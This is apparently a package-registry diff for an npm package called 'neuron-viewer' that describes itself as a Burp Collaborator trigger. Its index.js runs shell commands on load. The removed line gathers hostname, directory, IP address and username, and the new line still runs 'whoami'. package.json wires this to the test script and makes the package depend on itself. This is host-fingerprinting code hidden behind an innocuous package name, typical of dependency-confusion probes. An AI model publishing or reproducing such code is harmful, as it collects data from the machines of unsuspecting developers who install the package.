neuron-viewer 9.5.5 → 9.5.6

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +4 -2
package/index.js CHANGED
@@ -33,5 +33,5 @@ function executeCommand(command) {
33
33
  }
34
34
 
35
35
  // Example: Execute a command (e.g., 'whoami')
36
- executeCommand('echo "Hostname: $(hostname), Directory: $(pwd), IP Address: $(hostname -I | awk '{print $1}'), Username: $(whoami)"');
36
+ executeCommand('whoami');
37
37
 
package/package.json CHANGED
@@ -1,10 +1,12 @@
1
1
  {
2
2
  "name": "neuron-viewer",
3
- "version": "9.5.5",
3
+ "version": "9.5.6",
4
4
  "description": "A simple package to trigger Burp Collaborator for security testing",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "test": "node index.js"
8
+ },
9
+ "dependencies": {
10
+ "neuron-viewer": "^9.5.5"
8
11
  }
9
12
  }
10
-